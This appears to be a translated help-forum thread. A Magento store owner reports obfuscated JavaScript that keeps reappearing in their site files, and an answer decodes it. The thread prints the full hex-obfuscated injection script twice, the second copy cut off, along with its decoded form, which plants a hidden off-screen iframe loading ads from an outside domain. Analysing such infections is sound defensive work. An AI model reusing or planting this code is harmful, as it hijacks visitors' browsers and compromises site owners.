Javascript 恶意软件
Javascript Malware
我的 magento javascript 文件出现一些奇怪的问题已有 5 天了。有一些代码,例如:
/*e37931de3b5feaa824f544bdb33a8df2*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x7a\x7a\x7a\x61\x69"]=["\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x66\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x61\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33","\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x63\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x63\x33\x31","\x37\x33\x37\x34\x36\x35\x37\x32\x37\x36\x36\x31\x37\x30\x36\x66\x36\x39\x36\x64\x36\x35\x36\x65\x36\x39\x36\x31\x36\x63\x36\x35\x36\x65\x36\x31\x32\x65\x36\x39\x36\x65\x36\x36\x36\x66\x32\x66\x36\x64\x36\x35\x36\x37\x36\x31\x36\x31\x36\x34\x37\x36\x36\x35\x37\x32\x37\x34\x36\x39\x37\x61\x36\x35\x32\x66\x33\x66\x36\x62\x36\x35\x37\x39\x37\x37\x36\x66\x37\x32\x36\x34\x33\x64\x36\x31\x33\x37\x36\x34\x36\x31\x33\x35\x36\x33\x33\x36\x33\x32\x33\x38\x36\x35\x33\x31\x33\x36\x33\x30\x33\x38\x33\x37\x36\x36\x36\x34\x36\x36\x36\x34\x33\x32\x33\x32\x33\x30","\x36\x31\x36\x35\x36\x32\x36\x31\x36\x31\x33\x34\x33\x34\x36\x32\x36\x35\x36\x31\x32\x32\x33\x62\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x65\x36\x39\x36\x65\x36\x65\x36\x35\x37\x32\x34\x38\x35\x34\x34\x64\x34\x63\x33\x64\x32\x32\x33\x63\x36\x34\x36\x39\x37\x36\x32\x30\x37\x33\x37\x34\x37\x39\x36\x63\x36\x35\x33\x64\x32\x37\x37\x30\x36\x66\x37\x33\x36\x39\x37\x34\x36\x39\x36\x66\x36\x65\x33\x61\x36\x31\x36\x32\x37\x33\x36\x66\x36\x63\x37\x35\x37\x34\x36\x35\x33\x62\x37\x61\x32\x64\x36\x39\x36\x65\x36\x34\x36\x35\x37\x38\x33\x61\x33\x31\x33\x30","\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x32\x31\x33\x64\x32\x30\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x39\x37\x62\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31","\x33\x30\x33\x30\x33\x62\x37\x34\x36\x66\x37\x30\x33\x61\x32\x64\x33\x31\x33\x30\x33\x30\x33\x30\x37\x30\x37\x38\x33\x62\x36\x63\x36\x35\x36\x36\x37\x34\x33\x61\x32\x64\x33\x39\x33\x39\x33\x39\x33\x39\x37\x30\x37\x38\x33\x62\x32\x37\x33\x65\x33\x63\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x32\x30\x37\x33\x37\x32\x36\x33\x33\x64\x32\x37\x32\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65","\x32\x38\x36\x33\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x34\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x33\x62\x36\x34\x32\x65\x37\x33\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x36\x34\x32\x65\x36\x37\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x32\x62\x36\x33\x32\x39\x33\x62\x37\x64\x36\x39\x36\x36\x32\x38\x36\x31\x32\x30\x32\x36\x32\x36\x32\x30\x36\x32\x32\x39\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65","\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x36\x31\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x32\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x35\x32\x36\x35\x36\x37\x34\x35\x37\x38\x37\x30\x32\x38\x36\x31\x32\x62\x32\x37\x33\x64\x32\x38\x35\x62\x35\x65\x33\x62\x35\x64\x32\x39\x37\x62\x33\x31\x32\x63\x37\x64\x32\x37\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30","\x65\x49\x6e\x74\x28\x74\x7a\x7a\x68\x69\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x64\x61\x64\x61\x61\x2c\x64\x61\x64\x61\x61\x2b\x32\x29\x2c\x20\x31\x36\x29\x2b\x22\x2c\x22\x3b\x7d\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x68\x69\x6e\x62\x74\x2e\x6c\x65\x6e\x67\x74\x68\x2d\x31\x29\x3b\x65\x76\x61\x6c\x28\x65\x76\x61\x6c\x28\x27\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x27\x2b\x68\x69\x6e\x62\x74\x2b\x27\x29\x27\x29\x29\x3b\x7d\x29\x28\x29\x3b","\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x30\x33\x64\x32\x30\x36\x31\x32\x62\x32\x37\x33\x64\x32\x37\x32\x62\x36\x32\x32\x62\x32\x38\x36\x33\x32\x30\x33\x66\x32\x30\x32\x37\x33\x62\x32\x30\x36\x35\x37\x38\x37\x30\x36\x39\x37\x32\x36\x35\x37\x33\x33\x64\x32\x37\x32\x62\x36\x34\x32\x65\x37\x34\x36\x66\x35\x35\x35\x34\x34\x33\x35\x33\x37\x34\x37\x32\x36\x39\x36\x65\x36\x37\x32\x38\x32\x39\x32\x30\x33\x61\x32\x30\x32\x37\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30","\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x68\x69\x6e\x62\x74\x3d\x22\x22\x3b\x76\x61\x72\x20\x74\x7a\x7a\x68\x69\x3d\x22\x37\x37\x36\x39\x36\x65\x36\x34\x36\x66\x37\x37\x32\x65\x36\x66\x36\x65\x36\x63\x36\x66\x36\x31\x36\x34\x32\x30\x33\x64\x32\x30\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x38\x32\x39\x37\x62\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x36\x31\x32\x63\x36\x32\x32\x63\x36\x33\x32\x39\x37\x62\x36\x39\x36\x36","\x36\x32\x32\x65\x36\x35\x37\x38\x36\x35\x36\x33\x32\x38\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x33\x35\x62\x33\x30\x35\x64\x32\x65\x37\x33\x37\x30\x36\x63\x36\x39\x37\x34\x32\x38\x32\x37\x33\x64\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x32","\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\x36\x31\x37\x30\x37\x30\x36\x35\x36\x65\x36\x34\x34\x33\x36\x38\x36\x39\x36\x63\x36\x34\x32\x38\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x64\x61\x64\x61\x61\x3d\x30\x3b\x64\x61\x64\x61\x61\x3c\x74\x7a\x7a\x68\x69\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x64\x61\x64\x61\x61\x2b\x3d\x32\x29\x7b\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2b\x70\x61\x72\x73","\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x37\x32\x36\x35\x36\x31\x37\x34\x36\x35\x34\x35\x36\x63\x36\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x38\x32\x32\x36\x34\x36\x39\x37\x36\x32\x32\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x30\x33\x64\x32\x30\x32\x32\x36\x38\x37\x34\x37\x34\x37\x30\x33\x61\x32\x66\x32\x66\x37\x36\x37\x32\x36\x66\x37\x34\x32\x65"];var bhtad=ftrsn=nkkkk=knzsd=rbikr=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"],nftkr=window;eval(eval("[nftkr[\"ftrsn\"][\"\x31\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x36\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x39\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x37\"],nftkr[\"nkkkk\"][\"\x31\x31\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x34\"],nftkr[\"rbikr\"][\"\x31\"],nftkr[\"nkkkk\"][\"\x31\x33\"],nftkr[\"knzsd\"][\"\x32\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x33\"],nftkr[\"knzsd\"][\"\x35\"],nftkr[\"bhtad\"][\"\x31\x32\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x38\"]].join(\"\");"));/*e37931de3b5feaa824f544bdb33a8df2*/
我用 rkhunter 和 clamav 检查了网络服务器,但没有找到任何东西,从备份存档中替换可以工作 1 天,而且这段代码会再次从我的文件中自行写入,我在这个博客中找到了一些东西:Massive Admedia/Adverting iFrame Infection这和我的完全一样,除了我使用的是 magento。
我已经精疲力竭地解决这个问题,需要你的帮助。
如果你找到了解决这个问题的方法,我将不胜感激。
谢谢
技术
"\x64\x6f"被解码为do,只需将其粘贴到浏览器控制台,就会显示解码后的字符串
所以 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"] 是 window["document"]["zzzai"]
eval() 是 javascript 来自字符串的代码评估,因此 eval("alert('text')") 将抛出警报,尽管函数在字符串中。
所有这些代码只是隐藏了简单的东西,所以它看起来像一些内部浏览器的东西或插件库
总结
解码后的脚本看起来像这样
window["293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e"]
var bhtad=ftrsn=nkkkk=knzsd=rbikr=window.document.zzzai;
(function(){
var hinbt="";
var tzzhi="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822316535313439633538313335323539396238366630346365353134396335383133353235393962383666303463313231373031363261222c226131363134663663653235306661623462396161313734633966383266623264222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e737465727661706f696d656e69616c656e612e696e666f2f6d656761616476657274697a652f3f6b6579776f72643d6137646135633632386531363038376664666432323061656261613434626561223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";
for (var dadaa=0; dadaa < tzzhi.length; dadaa+=2) {
hinbt = hinbt + parseInt(tzzhi.substring(dadaa, dadaa + 2), 16) + ",";
}
hinbt = hinbt.substring(0, hinbt.length - 1);
eval(eval('String.fromCharCode(' + hinbt + ')'));
})();
它的执行会将带有成人内容的 iframe 注入页面
window.onload = function(){
function x22bq(a,b,c){
if(c){
var d = new Date();
d.setDate(d.getDate() + c);
}
if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');
else return false;
}
function x33bq(a){
var b = new RegExp(a+'=([^;]){1,}');
var c = b.exec(document.cookie);
if(c) c = c[0].split('=');
else return false;
return c[1] ? c[1] : false;
}
var x33dq = x33bq("1e5149c581352599b86f04ce5149c581352599b86f04c12170162a","a1614f6ce250fab4b9aa174c9f82fb2d",1);
var x22dq = document.createElement("div");
var x22qq = "http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea";
x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"+x22qq+"'></iframe></div>";
document.body.appendChild(x22dq);
}
所以它插入了来自 http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea url 的广告,这就是我所知道的
我的 magento javascript 文件出现一些奇怪的问题已有 5 天了。有一些代码,例如:
/*e37931de3b5feaa824f544bdb33a8df2*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x7a\x7a\x7a\x61\x69"]=["\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x66\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x61\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33","\x36\x35\x33\x35\x33\x31\x33\x34\x33\x39\x36\x33\x33\x35\x33\x38\x33\x31\x33\x33\x33\x35\x33\x32\x33\x35\x33\x39\x33\x39\x36\x32\x33\x38\x33\x36\x36\x36\x33\x30\x33\x34\x36\x33\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x63\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x63\x33\x31","\x37\x33\x37\x34\x36\x35\x37\x32\x37\x36\x36\x31\x37\x30\x36\x66\x36\x39\x36\x64\x36\x35\x36\x65\x36\x39\x36\x31\x36\x63\x36\x35\x36\x65\x36\x31\x32\x65\x36\x39\x36\x65\x36\x36\x36\x66\x32\x66\x36\x64\x36\x35\x36\x37\x36\x31\x36\x31\x36\x34\x37\x36\x36\x35\x37\x32\x37\x34\x36\x39\x37\x61\x36\x35\x32\x66\x33\x66\x36\x62\x36\x35\x37\x39\x37\x37\x36\x66\x37\x32\x36\x34\x33\x64\x36\x31\x33\x37\x36\x34\x36\x31\x33\x35\x36\x33\x33\x36\x33\x32\x33\x38\x36\x35\x33\x31\x33\x36\x33\x30\x33\x38\x33\x37\x36\x36\x36\x34\x36\x36\x36\x34\x33\x32\x33\x32\x33\x30","\x36\x31\x36\x35\x36\x32\x36\x31\x36\x31\x33\x34\x33\x34\x36\x32\x36\x35\x36\x31\x32\x32\x33\x62\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x65\x36\x39\x36\x65\x36\x65\x36\x35\x37\x32\x34\x38\x35\x34\x34\x64\x34\x63\x33\x64\x32\x32\x33\x63\x36\x34\x36\x39\x37\x36\x32\x30\x37\x33\x37\x34\x37\x39\x36\x63\x36\x35\x33\x64\x32\x37\x37\x30\x36\x66\x37\x33\x36\x39\x37\x34\x36\x39\x36\x66\x36\x65\x33\x61\x36\x31\x36\x32\x37\x33\x36\x66\x36\x63\x37\x35\x37\x34\x36\x35\x33\x62\x37\x61\x32\x64\x36\x39\x36\x65\x36\x34\x36\x35\x37\x38\x33\x61\x33\x31\x33\x30","\x33\x31\x33\x32\x33\x31\x33\x37\x33\x30\x33\x31\x33\x36\x33\x32\x36\x31\x32\x32\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x32\x31\x33\x64\x32\x30\x32\x32\x36\x31\x33\x31\x33\x36\x33\x31\x33\x34\x36\x36\x33\x36\x36\x33\x36\x35\x33\x32\x33\x35\x33\x30\x36\x36\x36\x31\x36\x32\x33\x34\x36\x32\x33\x39\x36\x31\x36\x31\x33\x31\x33\x37\x33\x34\x36\x33\x33\x39\x36\x36\x33\x38\x33\x32\x36\x36\x36\x32\x33\x32\x36\x34\x32\x32\x32\x39\x37\x62\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x32\x32\x33\x31","\x33\x30\x33\x30\x33\x62\x37\x34\x36\x66\x37\x30\x33\x61\x32\x64\x33\x31\x33\x30\x33\x30\x33\x30\x37\x30\x37\x38\x33\x62\x36\x63\x36\x35\x36\x36\x37\x34\x33\x61\x32\x64\x33\x39\x33\x39\x33\x39\x33\x39\x37\x30\x37\x38\x33\x62\x32\x37\x33\x65\x33\x63\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x32\x30\x37\x33\x37\x32\x36\x33\x33\x64\x32\x37\x32\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65","\x32\x38\x36\x33\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x34\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x33\x62\x36\x34\x32\x65\x37\x33\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x36\x34\x32\x65\x36\x37\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x32\x62\x36\x33\x32\x39\x33\x62\x37\x64\x36\x39\x36\x36\x32\x38\x36\x31\x32\x30\x32\x36\x32\x36\x32\x30\x36\x32\x32\x39\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65","\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x36\x31\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x32\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x35\x32\x36\x35\x36\x37\x34\x35\x37\x38\x37\x30\x32\x38\x36\x31\x32\x62\x32\x37\x33\x64\x32\x38\x35\x62\x35\x65\x33\x62\x35\x64\x32\x39\x37\x62\x33\x31\x32\x63\x37\x64\x32\x37\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30","\x65\x49\x6e\x74\x28\x74\x7a\x7a\x68\x69\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x64\x61\x64\x61\x61\x2c\x64\x61\x64\x61\x61\x2b\x32\x29\x2c\x20\x31\x36\x29\x2b\x22\x2c\x22\x3b\x7d\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x68\x69\x6e\x62\x74\x2e\x6c\x65\x6e\x67\x74\x68\x2d\x31\x29\x3b\x65\x76\x61\x6c\x28\x65\x76\x61\x6c\x28\x27\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x27\x2b\x68\x69\x6e\x62\x74\x2b\x27\x29\x27\x29\x29\x3b\x7d\x29\x28\x29\x3b","\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x30\x33\x64\x32\x30\x36\x31\x32\x62\x32\x37\x33\x64\x32\x37\x32\x62\x36\x32\x32\x62\x32\x38\x36\x33\x32\x30\x33\x66\x32\x30\x32\x37\x33\x62\x32\x30\x36\x35\x37\x38\x37\x30\x36\x39\x37\x32\x36\x35\x37\x33\x33\x64\x32\x37\x32\x62\x36\x34\x32\x65\x37\x34\x36\x66\x35\x35\x35\x34\x34\x33\x35\x33\x37\x34\x37\x32\x36\x39\x36\x65\x36\x37\x32\x38\x32\x39\x32\x30\x33\x61\x32\x30\x32\x37\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30","\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x68\x69\x6e\x62\x74\x3d\x22\x22\x3b\x76\x61\x72\x20\x74\x7a\x7a\x68\x69\x3d\x22\x37\x37\x36\x39\x36\x65\x36\x34\x36\x66\x37\x37\x32\x65\x36\x66\x36\x65\x36\x63\x36\x66\x36\x31\x36\x34\x32\x30\x33\x64\x32\x30\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x38\x32\x39\x37\x62\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x36\x31\x32\x63\x36\x32\x32\x63\x36\x33\x32\x39\x37\x62\x36\x39\x36\x36","\x36\x32\x32\x65\x36\x35\x37\x38\x36\x35\x36\x33\x32\x38\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x33\x35\x62\x33\x30\x35\x64\x32\x65\x37\x33\x37\x30\x36\x63\x36\x39\x37\x34\x32\x38\x32\x37\x33\x64\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x32","\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\x36\x31\x37\x30\x37\x30\x36\x35\x36\x65\x36\x34\x34\x33\x36\x38\x36\x39\x36\x63\x36\x34\x32\x38\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x64\x61\x64\x61\x61\x3d\x30\x3b\x64\x61\x64\x61\x61\x3c\x74\x7a\x7a\x68\x69\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x64\x61\x64\x61\x61\x2b\x3d\x32\x29\x7b\x68\x69\x6e\x62\x74\x3d\x68\x69\x6e\x62\x74\x2b\x70\x61\x72\x73","\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x37\x32\x36\x35\x36\x31\x37\x34\x36\x35\x34\x35\x36\x63\x36\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x38\x32\x32\x36\x34\x36\x39\x37\x36\x32\x32\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x30\x33\x64\x32\x30\x32\x32\x36\x38\x37\x34\x37\x34\x37\x30\x33\x61\x32\x66\x32\x66\x37\x36\x37\x32\x36\x66\x37\x34\x32\x65"];var bhtad=ftrsn=nkkkk=knzsd=rbikr=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"],nftkr=window;eval(eval("[nftkr[\"ftrsn\"][\"\x31\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x36\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x39\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x37\"],nftkr[\"nkkkk\"][\"\x31\x31\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x30\"],nftkr[\"\x6b\x6e\x7a\x73\x64\"][\"\x34\"],nftkr[\"rbikr\"][\"\x31\"],nftkr[\"nkkkk\"][\"\x31\x33\"],nftkr[\"knzsd\"][\"\x32\"],nftkr[\"\x6e\x6b\x6b\x6b\x6b\"][\"\x33\"],nftkr[\"knzsd\"][\"\x35\"],nftkr[\"bhtad\"][\"\x31\x32\"],nftkr[\"\x62\x68\x74\x61\x64\"][\"\x38\"]].join(\"\");"));/*e37931de3b5feaa824f544bd